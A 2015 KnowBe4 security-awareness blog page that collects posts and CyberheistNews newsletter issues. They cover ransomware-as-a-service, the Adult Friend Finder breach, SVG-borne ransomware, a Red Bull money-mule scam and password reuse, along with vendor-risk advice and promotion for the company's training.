KnowBe4 Security Awareness Training Blog

It's heeere! Criminal Ransomware as a Service

Posted by Stu Sjouwerman on May 28, 2015 9:56:00 AM

As we predicted in our whitepaper "Your Money or Your Life/Files", there is now shake-and-bake criminal ransomware that aspiring Internet criminals can put together in a few minutes. Meet 'Tox', Ransomware for the rest of us.

In short, you can now go to this TOR website "for criminals by criminals", roll your own ransomware for free, and the site takes a 20% kickback of every Bitcoin ransom payment.  

Jim Walter at McAfee Labs commented: "The packaging of malware and malware-construction kits for cybercrime “consumers” has been a long-running trend. Various turnkey kits that cover remote access plus botnet plus stealth functions are available just about anywhere. Ransomware, though very prevalent, has not yet appeared in force in easy-to-deploy kits. But now we have Tox–and it’s free."

Read More

The Information Security Policy Trap

Posted by Stu Sjouwerman on May 27, 2015 9:42:32 AM

InfoSec genius Ben Tomhave wrote:

"It's that time of year again: time to update the policies! This annual exercise is always a source of great enjoyment for me (no, not really). After all, there's nothing like having the non-technical flailing about as they try to force-feed technical requirements down the throats of IT without explaining, justifying, or providing any factual basis for asking. If there's something most techies love, it's an over-the-top policy recommended by external auditors.

Quite frankly, policies are the precursor to, and embodiment of, the checkbox-compliance mindset. We all know how well that's worked out for us thus far. I mean, looking at all the data breaches we're not having thanks to compliance and policies, right? Hahaha... oh.

Read More

Is Your Network Infected With Sleeper Ransomware?

Posted by Stu Sjouwerman on May 26, 2015 6:11:00 PM

This is a concerning new "sleeper" ransomware twist.

It's called Locker and has been infecting employee's workstations but sat there silently until midnight May 25, 2015 when it woke up. Locker then started to wreak havoc in a massive way.

Since this strain literally stuck up its ugly head, Reddit has a topic on it with over 600 comments.

Bleepingcomputer has a support topic that is 14 pages long and they received 100s of emails from consultants all over the world. Based on their experience with cryptoware, they stated this strain has a large "installed" base, which does not bode much good. Topics related to this new strain are suddenly posted on all the major support boards, AV forums, etc.

Read More

Will Your Contractors Take Down Your Business?

Posted by Stu Sjouwerman on May 26, 2015 11:07:22 AM

Will Your Contractors Take Down Your Business?

Do you know how well your vendors, business associates, contracted third parties (who I will collectively call “contractors”) are protecting the information with which you’ve entrusted them to perform some sort of business activity? You need to know.

Late last year, a study of breaches in the retail industry revealed 33 percent of them were from third party vendor access vulnerabilities. The largest healthcare breach in 2014 was from a business associate (the contractor of a hospital system) and involved the records of 4.5 million patients.

The list of breaches caused by contractors throughout all industries could fill a large book. The damage that your third parties can cause to your business can be significant. Do you know the risks that your contractors and other third parties bring to your organization? Or, will your contractors take down your business because of their poor security and privacy practices?

I’ve led over 300 contractor information security and privacy assessments. I’ve see a lot of crazy things, risky things, and downright incredibly stupid things. I’ve also seen a lot of common information security and privacy problems that contractors bring to those hiring them.

As a start to your contractor information security and privacy management activities, here are five things to check on when contracting another company to perform services on your behalf, especially those involving personal information.

  1. Documented information security and privacy policies and procedures need to exist. And not only exist, the employees also need to know they exist, and they need to be actually following them. The policies and procedures also need to be kept updated to address changes in the business environment, risk environment and to meet changes in legal requirements. A large portion of the contractors I’ve assessed said they had policies and procedures, but when I asked to see them they’ve replied something to the effect of, “Oh, they are undocumented but understood policies. We are a small company; we share our policies by word of mouth.”

You need to make sure they have documented policies and procedures. If it isn't written, it isn't true.

  1. They need to understand their obligations to appropriately safeguard personal information. In the past year I’ve actually had over a dozen contractors state that they did not believe that they needed to safeguard personal information if that information is discoverable online. What blockheads are continuing to spread this horrible advice? Worse yet, some of these contractors with this belief were even selling the personal information to create another revenue path.

You need to make sure your contractors understand that they must appropriately secure, and not share, the personal information you’ve entrusted to them. 

  1. They need to provide security awareness trainingMany of the activities contractors say they do for training are not training. One contractor I assessed said their training was the message they sent to their employees telling them to read the information security policies; this is *not* training. Another contractor copied, verbatim, the entire HIPAA regulatory text and pasted into ~300 PowerPoint slides, and then told their workers to “view” the “training” slides. This is not training. Information security and privacy training, and awareness communications, must actually provide educational value!

You need to make sure your contractors provide regular information security and privacy training to their workers, and regularly send awareness reminders. 

  1. They don’t perform risk assessments. A large percentage of the contractors I’ve assessed, around 25 – 30 percent, had never performed a risk assessment. An additional percentage, also around 25 – 30 percent, had performed a risk assessment once, and that was it. Some of those solitary risk assessments were performed over 5, 10, and even one was 17, years ago. Yes, these two types of contractors represent around half of the contractors. You cannot effectively secure information if you do not know where your risks are located, and what kind of risks you have. These types of contractors are leaving your organization vulnerable.

You need to make sure your contractors have a risk management process in place 

  1. They don’t use basic security tools. Encryption, audit logs, mobile computing security tool, patch management, and other basics are not used by many contractors; even contractors providing IT services. Over the years I’ve found a large majority of contractors did not use encryption on their web sites, even for forms where they were collecting personal information on behalf of their client who contracted them. They also often do not have their mobile devices encrypted, and most also don’t encrypt sensitive information they send using emails and text messages. There is also a significant portion not logging access to personal information, and not logging major security events. And surprisingly, many still do not use comprehensive anti-malware tools or firewalls on personal devices. Even if such basic security was required within their SLA, that requirement was often not communicated to those who wound need to implement such tools.

Make sure your contractors have basic, expected security tools implemented, beyond just including within the contract and/or SLA. Your contractors need to use basic security tools to protect the information you’ve entrusted to them.  

You Cannot Outsource Your Responsibility

This is also a very important thing to know: Generally, a hold harmless clause in the contract you use to try and relieve all responsibility for the bad things that may happen that are caused by the contractor will *not* alleviate you of all responsibility and accountability for breaches and other bad things that may occur as a result of their vendors’ actions, vulnerabilities, or unaddressed threats. I’ve heard this from well over half of the organizations I’ve spoken with and done projects for in the past five or so years.

I am still hearing way too many organizations state something very similar to: “We outsourced so we wouldn’t be liable for the security of the information when it is under the care of the outsourced entity.” It simply does not work that way, folks; for many reasons. But bottom line, your responsibility for securing and using information appropriately follows that information to whomever you have contracted.

 Remember…

Organizations will be judged by the company they keep … the businesses they contract. If organizations don’t want to become proactive about their oversight of those contracted entities, I have a question for them: Are they ready to pay for the security and privacy sins of their contracted entities?

Want to know more about how to effectively create a contractor information security and privacy oversight management process or program? On May 28 I am giving a free webinar for ISACA: An Effective Framework for Third-party Information Security and Privacy Oversight & Risk Management. Consider attending. It will be recorded and available for future viewing.

PS: If you have not done so already, find out how affordable Kevin Mitnick Security Awareness Training is, and be pleasantly surprised.

Get A Quote Now

 

 

This was cross posted from the Privacy Professor Blog

Read More

CyberheistNews Vol 5 #20 Adult Friend Finder Hack Is Nightmare Phishing Problem

Posted by Stu Sjouwerman on May 26, 2015 9:18:23 AM

    
                                                                                                               
CyberheistNews Vol 5 #20 May 26, 2015
                                                                                                                                                                                                          
                                                                                  
Adult Friend Finder Hack Is Nightmare Phishing Problem
Guys, we have a real phishing problem with this Adult Friend Finder (AFF)  hack. This particular adult site is one of the most heavily trafficked  websites in the U.S. and has 40 million registered users. A rough guess is  that 10% of your users may be very worried at this time that their sexual  preferences and/or activities are going to come out. These end-users are  a security breach waiting to happen. You may have heard about it, but in short, the story is that the AFF site owed  $248,000 to someone, very likely an affiliate that was feeding them web  traffic, and apparently AFF did not pay up. The affiliate had a hacker  buddy who calls himself ROR[RG] and this guy decided to teach AFF a lesson.
 
He hacked them, exfiltrated at least 4 million records and then sent them  a ransom demand of $100,000 to return the data. Again, apparently AFF did  not pay up and ROR[RG] in retaliation posted these records on a Darknet  Tor site loaded with a ton of highly personal, sensitive information.

It includes their age, sexual preferences, state, zip code, username, IP  address, and if they are married or single, gay or straight, and are looking  for a "cheating one night stand" or more let's call it unorthodox sexual  activities. With a little bit of digging, these people are relatively easy  to find. Bev Robb, who does malware and Dark Web research, wrote a blog  post showing how easy it is.

FriendFinder Networks, a California-based company wrote that it had hired  FireEye's forensics unit, Mandiant, to investigate along with Holland and  Knight, a law firm, and a public relations company specializing in cybersecurity.

"We cannot speculate further about this issue, but rest assured, we pledge  to take the appropriate steps needed to protect our customers if they are  affected," it said. The company could not be reached for further comment.  UK TV Channel 4 reported it first, and stated exposed email addresses are  receiving a wave of spam. Here is their 4-minute segment.
http://www.channel4.com/news/adult-friendfinder-dating-hack-internet-dark-web

Here Is The Problem

Any of these 40 million registered users is now a target for a multitude of  social engineering attacks. Just one example: you can imagine that a man  married to a woman but who is hunting down gay hookups on the side could  easily be blackmailed or receive a spear phishing email with a poisoned  link that infects his workstation. 

People that have extramarital affairs can be made to click on links in emails  that threaten to out them. I can already see the phishing emails that claim  people can go to a website to find out if their private data has been  released. This is a nightmare that will be exploited by spammers, phishers  and blackmailers who are now gleefully rubbing their hands.

Mass media has jumped on this, the news of this hack is on CNN, NBC, you  name it. If any of your users has registered on AFF, they have probably  heard about it and are worried. This is a nightmare phishing scenario.  Jilted spouses, divorce attorneys and private investigators are undoubtedly  already pouring over the data.

What To Do About It

This is not an easy one. I suggest you take immediate preventive action.  It only takes one second for a worried end-user (or admin) to click on  a link in an email and expose the network to attackers. I suggest you  send something like this to your friends, family and end-users. Feel  free to edit:

"Last week, news broke that the Adult Friend Finder website was hacked.  This is a one of the top adult website for people that want casual  encounters, possibly cheating on their spouse. The site has 40 million  registered users, and millions of these records are now out in the open,  exposing highly sensitive personal information. Internet criminals are  going to exploit this in many ways, sending spam, phishing and possibly  blackmail messages, using social engineering tactics to make people  click on links or open infected attachments. Be on the lookout for  threatening messages like this that slip through and delete them  immediately."

As you can see, stepping your users through effective security awareness  training is an absolute must these days. For KnowBe4 customers, we have  a new Social Networking template that lures people into clicking on a  link to the "haveibeenpwned" website to see if their personal sensitive  information was hacked. The subject of the template is "Hey, has your  Adult Friend Finder secret come out?" 

PS: If you have not done so already, find out how affordable Kevin Mitnick  Security Awareness Training is, and be pleasantly surprised:
http://info.knowbe4.com/kmsat_get_a_quote_now

   

If This Is Your First Issue Of CyberheistNews...

       
CyberheistNews is the world's largest e-zine for IT professionals about social engineering and security awareness training, it is published by KnowBe4 LLC, arrives in your inbox once a week and looks at IT security from the human side. KnowBe4 has partnered with Kevin Mitnick to create new school Security Awareness Training combined with regular simulated phishing attacks.

In CyberheistNews we aim to help you keep your network safe with important news, hints, and tips so that you are aware of the latest social engineering scams and can do something about it.

KnowBe4 lives 100% in the cloud, we use SalesForce as our CRM and via their Data.com service we licensed your address. Consider this your sample issue. You can unsubscribe at any time (a few lines below), and you will stop receiving any and all further email.

Warm Regards,
Stu Sjouwerman

   
Quotes Of The Week
 
       
" Fidelity is the sister of justice." - Horace

" I told my wife the truth. I told her I was seeing a psychiatrist. Then she  told me the truth: that she was seeing a psychiatrist, two plumbers, and  a bartender."  - Rodney Dangerfield
       
     Thanks for reading CyberheistNews!
   
Security News
 

What Our Customers Say About Us

           
"Everything is going great! We got the training integrated into our LMS so  everyone is taking it right along all our other required training. Even  with a brisk employee turnover, our click rate runs between 0 and 4%  depending on how many new employees are here “pre-training.”

"We receive genuine phishing emails from time to time (email security can’t  catch them all) and they are quickly detected and promptly reported  thanks to the training. I have recommended your security training and  phishing exercises to a number of colleagues, and some of them followed  up with a purchase.

"Many in my banking security peer group use and recommend you. Nice work,  you guys!" - P.J. CISSP, Information Security Officer 

InfoWorld's security guru Roger Grimes writes about KnowBe4's integrated  training and phishing platform. Check out this article:
http://www.infoworld.com/article/2920804/security/get-real-about-user-security-training.html    

   

This Week's Five Most Popular HackBusters Posts

           
What are IT security people talking about? Here are this week's five most popular hackbusters posts:
               
    1. Spy Agencies Hijack Google Play Store to Install Spyware on Smartphones
      http://www.hackbusters.com/news/stories/326697-spy-agencies-hijack-google-play-store-to-install-spyware-on-smartphones

    2. NetUSB Driver Flaw Exposes Millions of Routers to Hacking
      http://www.hackbusters.com/news/stories/325860-netusb-driver-flaw-exposes-millions-of-routers-to-hacking

    3. Who Really Invented Bitcoin?
      http://www.hackbusters.com/news/stories/323830-who-really-invented-bitcoin

    4. Anti-NSA Pranksters Planted Tape Recorders Across New York and Published Your Conversations
      http://www.hackbusters.com/news/stories/325983-anti-nsa-pranksters-planted-tape-recorders-across-new-york-and-published-your-conversations


    5. Free Ransomware Decryption and Malware Removal ToolKit
      http://www.hackbusters.com/news/stories/326769-free-ransomware-decryption-and-malware-removal-toolkit
   

Why Isn't User Training A Security Priority?           

Only about half of companies offer any kind of security training, a CompTIA  survey found. End users are widely seen as a weak link in the enterprise  security chain. More than 80 percent of respondents to a QuinStreet Enterprise  survey tapped end users as a top security risk for their organizations. 

Craig Williams, security outreach manager for Cisco's Talos Security  Intelligence and Research Group, said end users working outside the confines  of corporate networks are a key entry point for attackers launching  malvertising attacks.

"Attackers notice when machines are not up-to-date. They can find one that  is not following security best practices and then embed a link so you have  a landing page hosting a drive-by download attack. Then they use social engineering to trick users to look at that page, serve up some malware, and  you are compromised," he said in an interview with eSecurity Planet earlier  this year.

Despite this, however, recent research by IT trade association CompTIA found  that just 54 percent of companies offer any kind of security training, with  most doing so during employee onboarding. When CompTIA asked companies it  surveyed why they did not offer security training to employees, "the biggest  reason was there was no reason," said Seth Robinson, senior director of  technology analysis at CompTIA. Read the full article at:
http://www.esecurityplanet.com/network-security/why-isnt-user-training-a-security-priority.html    

   

Researchers Observe SVG Files Being Used To Distribute Ransomware

           
Researchers with AppRiver have observed attackers sending out phishing emails  with SVG files attached – these files, when downloaded and executed, open up  websites that download what appears to be CryptoWall ransomware.

AppRiver observed thousands of phishing emails – one was sent from a Yahoo  address and claimed to include a resume – being sent to small stores, law  offices, IT businesses, schools and more, Jon French, security analyst with  AppRiver, told SCMagazine.com in a Thursday email correspondence.

In order for an infection to occur, user interaction is required more than  once, French indicated. First, a user must download the ZIP attachment in  the phishing email, which contains the SVG file. When the user opens the  SVG file, a small JavaScript entry will cause their browser to open to a  website that leads to another ZIP file being downloaded. This file contains  the payload, which must be manually executed.

When downloaded and executed, the SVG files cause websites to open up that  download what appears to be CryptoWall ransomware. Read the full article here:
http://www.scmagazine.com/svg-files-attached-to-phishing-emails-distribute-what-is-apparently-cryptowall-ransomware/article/416143/    

   

Study: Employees Acknowledge Risky Security Behavior, Continue To Do It           

While most people acknowledge the security risks of opening an email from  an unknown sender or downloading an app from an unauthorized app store, many  continue to engage in this risky behavior.

A new study from Blue Coat Systems found that 82 percent of U.S. employees  knew that opening an email from an unverified source is considered  “very risky;” however, 17 percent still admitted to doing so. This 17  percent could be mostly composed of people who weren't aware that this  behavior put their systems at-risk, said Hugh Thompson, CTO and senior  vice president, Blue Coat, in an interview with SCMagazine.com, although  the survey did not relate the two questions.

Even still, Thompson suggested that those knowledgeable of the risk could  be opening emails from unknown senders because, in reality, phishing emails  are becoming trickier, and their perpetrators are personalizing attacks.

Thompson went on to say that everyone has a weak spot that could entice  them to open an email, such as a favorite sports team, for example, and  with social media making this information readily available, creating a  convincing email isn't too difficult a task.

Considering that of the 250 U.S. respondents to Blue Coat's survey half  of whom were at the CIO level, even IT security pros fall victim to  various attacks.

“We do live in a time when anyone can be deceived,” Thompson said.  “Anyone can be phished, even the most paranoid.” Article at SC Mag:
http://www.scmagazine.com/blue-coat-system-conducts-security-survey/article/415611/    

   

How Employee Training Can Affect The Organization

Employee training and awareness programs will have a huge effect on covered  entities, according to all three healthcare leaders. With anything from  phishing scams to sophisticated cyber attacks putting health data at risk,  it’s important for staff members to have a comprehensive idea of what type  of malicious activity to be on alert for.

“The trick is, how do we balance that with everything else that’s required  for [employees] to keep up their practices and actually what they need to  do: treat patients,” Ewell said.

Not only is employee training critical, according to Sah, employee training  at all levels is necessary. Everyone from senior level to contributors to  those affiliated with a covered entity’s partners and vendors must have an  understanding of proper health data security.

“All can fail if people are not aware,” Sah said. “And they need to be aware  in a way that when they see malicious activity or they see something  abnormal, that they have the awareness, knowledge, and know-how to take  the next step of action.”

For example, if an employee sees what they think might be a phishing email,  it’s essential to not only recognize it as malicious activity, but to then  take the next step and notify the necessary personnel. That will better  help the organization respond to the issue, Sah explained.

“A single person who is not aware can still cause a gap that can then be  leveraged to create the types of threats or attacks we’ve seen,” said Sah.  “[Employee training] is the most invaluable thing that any organization  can do.” Full article at HealthIT Security:
http://healthitsecurity.com/news/important-lessons-for-health-data-privacy-security-in-2015

 

Cyberheist 'FAVE' LINKS:
 
    • Zlata wows the audience at the talent show Star King Korea 2015. She comes  from Russia. She is a gymnast, model, actress and winner of four Guinness  World records. According to the Discovery Channel, she is the "most flexible  woman in the world". Holy Schmoly!
      http://www.flixxy.com/flexible-woman-at-korean-talent-show.htm?utm_source=4
    • Alexandru Duru Flies 905 Feet On A Real Hoverboard. I want one!:
      http://www.flixxy.com/alexandru-duru-flies-905-feet-on-a-real-hoverboard.htm?utm_source=4
    • Strong winds at Madeira airport makes landing an airplane a real challenge.  Yikes, some of these are literally touch and go:
      http://www.flixxy.com/windy-landings-and-awesome-go-arounds-at-madeira-airport.htm?utm_source=4
    • Theo Jansen creates huge wind-powered creatures that move entirely on their own.
      http://www.flixxy.com/wind-powered-creatures-by-theo-jansen.htm?utm_source=4
    • Ruti, the cat, brings the dog back home on a leash. Hilarious!
      http://www.flixxy.com/cat-taking-the-dog-home.htm?utm_source=4
    • Check out this guy! Gasper Nali from Malawi, Africa produces an awesome  beat on his home-made 'babatone.':
      http://www.flixxy.com/awesome-african-musician-gasper-nali.htm?utm_source=4
    • A compilation of smart and funny dogs doing things to entertain their humans, check out this dog playing pool, he's good!:
      http://www.flixxy.com/smart-and-funny-dogs.htm?utm_source=4
                                                                                        
           
 Copyright © 2014-2015 KnowBe4 LLC, All rights reserved.                                                            
Our mailing address is:  33 N. Garden Ave Suite 1200, Clearwater, Florida, 33755
               
Read More

Adult Friend Finder Hack Is Nightmare Phishing Problem

Posted by Stu Sjouwerman on May 23, 2015 10:21:00 AM

Guys, we have a real phishing problem with this Adult Friend Finder (AFF) hack. This particular adult site is one of the most heavily-trafficked websites in the U.S. and has 40 million registered users. A rough guess is that 10% of your users may be very worried at this time that their sexual preferences and/or activities are going to come out. These end-users are a security breach waiting to happen. 

Read More

Researchers Observe SVG Files Being Used To Distribute Ransomware

Posted by Stu Sjouwerman on May 23, 2015 8:04:00 AM

cryptowall-thmb-resized-600Researchers with AppRiver have observed attackers sending out phishing emails with SVG files attached – these files, when downloaded and executed, open up websites that download what appears to be CryptoWall ransomware. 

AppRiver observed thousands of phishing emails – one was sent from a Yahoo address and claimed to include a resume – being sent to small stores, law offices, IT businesses, schools and more, Jon French, security analyst with AppRiver, told SCMagazine.com in a Thursday email correspondence.

In order for an infection to occur, user interaction is required more than once, French indicated. First, a user must download the ZIP attachment in the phishing email, which contains the SVG file. When the user opens the SVG file, a small JavaScript entry will cause their browser to open to a website that leads to another ZIP file being downloaded. This file contains the payload, which must be manually executed.

Read More

CyberheistNews Vol 5 #19 Scam Of The Week: Red Bull Money Mule Victims

Posted by Stu Sjouwerman on May 19, 2015 8:58:32 AM

                                                       
CyberheistNews Vol 5 #19 May 19, 2015

  Scam Of The Week: Red Bull Money Mule Victims


Warn your employees, friends and family about a cunning money laundering  scam that is currently back on the rise. This lure was first used during  spring break in 2014 and apparently successful because it's back.

It's an email claiming to be from Red Bull and offers offers to place Red Bull ads on the victim's car for 600 bucks a week. It all sounds innocent  enough; wrap your car with advertising and make money driving around town.  There is a nasty catch though.

The scam email explains the benefits of the "business offer" and promises easy money that basically will pay for the whole car, gas money included.  However, if you sign up for it, this deal backfires and the victim is  investigated for money laundering fraud.

How This Scam Works

The first payment that arrives is much larger than originally agreed upon. The criminals apologize for the "error" and would the victim please quickly  deduct their own fee and wire the rest of the money back to them.

However it's either a forged or stolen check the victim received in the first place, or it's a fraudulent wire transfer from an account that was criminally taken over. In both cases the victim is left holding the bag  when the cops come knocking on their door. All initial evidence of the  fraud will point to them.

What To Do About It

I strongly recommend you send the following to your employees, friends and family. Feel free to copy/paste/edit:

"A new job scam is doing the rounds, preying on people that want to  make $600 a week with Red Bull advertising on their car. It sounds like a great deal, but this scam is run by criminals that will try to use their victims for money laundering. If you get an email claiming  to be from Red Bull and offers you an attractive advertising deal, use that delete key. In general, be very careful with any Internet "work  from home" schemes, many of these are fraudulent. Do not give out any  personal information to these criminals and warn your family members."

For KnowBe4 customers, we have a new phishing template in the Online Services campaign called "Advertising for Red Bull Energy Drink". Send  it to your employees and inoculate them against bogus second job offers  before they get into some real trouble.

There is an example of the scam email at the KnowBe4 Blog:
http://blog.knowbe4.com/scam-of-the-week-red-bull-money-mule-victims

   

Heads-up: 'Breaking Bad' Ransomware Beta Tested Down Under      

You can expect ransomware in America in the next few weeks which has  a Breaking Bad theme. Take this a bit further and we can expect  ransomware with Halloween themes later this year. Sheesh.

Some criminals are too smart for their own good though, because using  a TV show like this will make it much more recognizable and written  about, defeating the purpose.

Apart from the Breaking Bad theme, CryptoLocker.S. is pretty generic ransomware. It is surprising how fast ransom Trojans have spread.  A year ago every new strain was headline news, now it's on page 3.  This version grabs a wide range of data files, encrypts it using a  random AES key which then is encrypted using a public key.

Your employees can run into this strain like any other ransom Trojan  by opening an infected email attachment. It even opens a legitimate  PDF file to trick your users that everything is fine. In the mean time, back at the server farm... Anyway, block all zip files at the edge if you have not already, and make 100% sure your Backup/Restore actually works. More details and link to Symantec who found  this strain at the KnowBe4 Blog:
http://blog.knowbe4.com/heads-up-breaking-bad-ransomware-beta-tested-down-under

   

Need Your Input On Mobile Security Awareness Training      

We are trying to establish your interest in a mobile security awareness training platform for your employees. This platform is an app that runs on their smartphone, and has several features to help you keep your network safe by improving and reinforcing your human firewall. Please take 1 minute to answer 6 short questions and let us know what you think? Thanks so much in advance!

Here is the link to SurveyMonkey:
https://www.surveymonkey.com/s/KnowBe4Mobile 
Warm Regards,
Stu Sjouwerman
Quotes Of The Week
 
       
     " If you torture data sufficiently, it will confess to almost anything. " - F. Menger 

" The confession of evil works is the first beginning of good works. "  - Saint Augustine

  
     Thanks for reading CyberheistNews!
 
Security News
 

  Has Anyone Used KnowBe4?

May 14, 2014 7:45 AM BruceyBonus asked the following question at  the SpiceWorks Security Forum:

"Hi All, been in contact with a company called Knowbe4, they offer a  simulated phishing attack to your users and discover how high your  organization’s Phish-prone percentage is...any one heard of them or  used them? any information would be greatly appreciated...Thanks"

Within 2 days there were almost 50 replies. If you want independent, actual users describing their experience in their own words, you should  read these (unedited) answers at the forum:
http://community.spiceworks.com/topic/951007-has-anyone-used-knowbe4?

Combine that with a very positive review in InfoWorld, and you know where to go if you want to do something about users who never learn to  avoid stupid security mistakes that compromise your organization.

InfoWorld's security guru Roger Grimes writes about KnowBe4's integrated  training and phishing platform. Check out this article:
http://www.infoworld.com/article/2920804/security/get-real-about-user-security-training.html

   

  This Week's Five Most Popular HackBusters Posts       

 What are IT security people talking about? Here are this week's five most  popular Hackbusters posts:
    1. Feds Say That Banned Researcher Commandeered a Plane:
      http://www.hackbusters.com/news/stories/323529-feds-say-that-banned-researcher-commandeered-a-plane
    2. CHIP — The World's First $9 Computer:
      http://www.hackbusters.com/news/stories/321580-chip-the-world-s-first-9-computer

    3. Unwilling DNA Samples Used In Advertising:
      http://www.hackbusters.com/news/stories/323839-unwilling-dna-samples-used-in-advertising

    4. This Little 3-D Printed Robot Cracks Combination Locks In 30 Seconds:
      http://www.hackbusters.com/news/stories/322680-this-little-3-d-printed-robot-cracks-combination-locks-in-30-seconds

    5. Police warn of PennDOT 'phishing' scam:
      http://www.hackbusters.com/news/stories/322719-police-warn-of-penndot-phishing-scam-abc27

Starbucks Hack: A Great Example Why You Should Not Reuse Passwords

       
Use this story and send it to your employees as a cautionary tale to  make it real to them they should not reuse passwords in general, but especially not for any online payment accounts!

News broke this week that smart thieves use the Starbucks' mobile app to  steal money from users' bank accounts. You can use the app to pay at the Starbucks checkouts with your smartphone, and you can also set it up  to draw money from a linked account to reload your Starbucks card. The  coffee giant now operates the most popular mobile wallet payment system  in the U.S. so this is a big deal.

The attackers have been breaking into Starbucks accounts to repeatedly transfer money from bank accounts using the app's auto-reload function.  Starbucks hasn’t been able to stop fraudulent transactions even when  they are reported within a few minutes.

The problem is that the cyber thieves just need the user name and  password to get into the account. Starbucks publicly stated that their system has not been breached, but that these thefts are caused by stolen credentials on other sites and cause this problem for people  who reuse their user name and password on multiple sites.

So here are a few rules for online payments:

    1. Use a unique pass-phrase for online payment accounts. Do not  reuse that pass-phrase anywhere else.

    2. DO NOT share passwords across apps. This is hard but not impossible, especially if you use password managers like OnePass or LastPass.

    3. If you link an app for online payments, only use credit cards and never use debit cards or God forbid your bank account which simply is asking for trouble.

    4. Set your credit cards to email you real-time confirmation of expenses.  I have an AMEX card that emails me the amount of any charge over a  threshold I set.
Online payment systems are very convenient, but you need to use common sense and password discipline to make sure they don't become a major pain in the neck.
   

Wetware: The Major Data Security Threat You've Never Heard Of

       
Adam Levin, Forbes contributor explains what wetware is to the uninitiated,  and makes the case for more budget for awareness training. This is great  ammo to send to non-IT management level people.

He wrote: "For the first time, according to a recent study, criminal  and state-sponsored hacks have surpassed human error as the leading  cause of health care data breaches, and it could be costing the  industry as much as $6 billion. With an average organization cost  of $2.1 million per breach, the results of the study give rise to  a question: How do you define human error?

"More than half of the respondents in the Ponemon Institute’s Fifth  Annual Benchmark Study on Privacy & Security of Healthcare Data,  said their organization’s incident response team was underfunded or  understaffed and roughly one third of respondents had no incident  response plan in place at all—zip, nada, zilch—a fact that beggars  the imagination at a moment when breaches have become the third  certainty in life, and one that highlights the seeming no-show of  the “first do no harm” approach to patients on the data breach-prone  operations side of the health care industry."  More at Forbes:
http://www.forbes.com/sites/adamlevin/2015/05/14/wetware-the-major-data-security-threat-youve-never-heard-of/

   

The Best Defense Against Cybercrime? Get Your Employees On Board     

The UK-based ITProPortal's Charles Orton-Jones recently surveyed more  than a thousand office workers in the UK to gain insights into employee  attitudes about cyber-security and data theft. Many see data theft as  a victimless crime, especially millennial employees.

That is a problem but it gets worse. The survey also found that more than  72% of millennials believe they are entitled to take data they have  worked on compared with 41 per cent of baby boomers. An organization’s  approach to correcting such misperceptions internally should consider  these generational differences.

The article lists 4 major items that you should address to make  protecting data part of your culture:
    • "Clarify the business risk: Leadership must detail the consequences  of a data breach to the company’s financial results, relationships  with customers, and reputation.

    • "Align with values and culture: Data protection isn’t just the  responsibility of IT, it’s the responsibility of everyone in an  organization. Ensure you have processes in place for employees to  voice concerns, particularly during times of company transition.

    • "Involve employees directly in solutions: The data showed millennials  in particular are motivated by direct engagement in problem-solving,  so enlist them to help develop approaches that will resonate with  their peers.

    • "Partner with the compliance and IT teams: Technology or compliance  training around cyber security should be preceded by awareness  campaigns that reinforce the business urgency."
Quite simply, creating a culture where employees respect data and are  motivated to protect the business is critical to cyber security. More at:
http://www.itproportal.com/2015/05/15/best-defence-against-cyber-crime-get-your-employees-on-board/
   
Cyberheist 'FAVE' LINKS:
 
 
          
                                                                                                        
                                           
             
Read More

This Week's Five Most Popular HackBusters Posts 5/17/2015

Posted by Stu Sjouwerman on May 17, 2015 12:36:00 PM

What are IT security people talking about? Here are this week's five most popular hackbusters posts:
1) Feds Say That Banned Researcher Commandeered a Plane:
2) CHIP — The World's First $9 Computer:
3) Unwilling DNA Samples Used In Advertising:
4) This Little 3-D Printed Robot Cracks Combination Locks In 30 Seconds:
5) Police warn of PennDOT 'phishing' scam:
Read More

Starbucks Hack: A Great Example Why You Should Not Reuse Passwords

Posted by Stu Sjouwerman on May 17, 2015 11:58:00 AM

Use this story and send it to your employees as a cautionary tale to make it real to them they should not reuse passwords in general, but especially not for any online payment accounts!

News broke this week that smart thieves use the Starbucks' mobile app to steal money from users' bank accounts. You can use the app to pay at the checkouts with your smartphone, and you can also set it up to draw money from a linked account to reload your Starbucks card. The coffee giant now operates the most popular mobile wallet payment system in the U.S. so this is a big deal.

Read More

Subscribe to Our Newsletter!

Subscribe to Blog

Follow Me